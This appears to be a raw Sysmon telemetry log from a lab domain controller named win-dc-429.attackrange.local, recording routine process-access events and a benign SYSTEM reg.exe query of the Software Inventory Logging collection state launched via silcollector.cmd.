09:21:01.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054890Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054889Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054888Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054887Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054886Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054885Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054884Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.511{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CFD-6151-7C00-00000000FD01}812C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054883Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.511{5EBD8912-8CFD-6151-7B00-00000000FD01}36802644C:\Windows\system32\cmd.exe{5EBD8912-8CFD-6151-7C00-00000000FD01}812C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054882Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.514{5EBD8912-8CFD-6151-7C00-00000000FD01}812C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{5EBD8912-8CFD-6151-7B00-00000000FD01}3680C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 10341000x80000000000000001054881Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054880Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CFD-6151-7A00-00000000FD01}34083960C:\Windows\system32\conhost.exe{5EBD8912-8CFD-6151-7B00-00000000FD01}3680C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054879Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054878Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054877Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054876Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054875Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054874Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054873Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054872Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054871Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CFD-6151-7B00-00000000FD01}3680C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054870Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.496{5EBD8912-8CFD-6151-7900-00000000FD01}38163108C:\Windows\system32\cmd.exe{5EBD8912-8CFD-6151-7B00-00000000FD01}3680C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\msvcrt.dll+4ba7c|C:\Windows\system32\cmd.exe+103c4|C:\Windows\system32\cmd.exe+10910|C:\Windows\system32\cmd.exe+c36d|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054869Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.501{5EBD8912-8CFD-6151-7B00-00000000FD01}3680C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CFD-6151-7900-00000000FD01}3816C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd configure 10341000x80000000000000001054868Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CFD-6151-7A00-00000000FD01}34083960C:\Windows\system32\conhost.exe{5EBD8912-8CFD-6151-7900-00000000FD01}3816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054867Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CFD-6151-7A00-00000000FD01}3408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054866Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054865Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054864Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4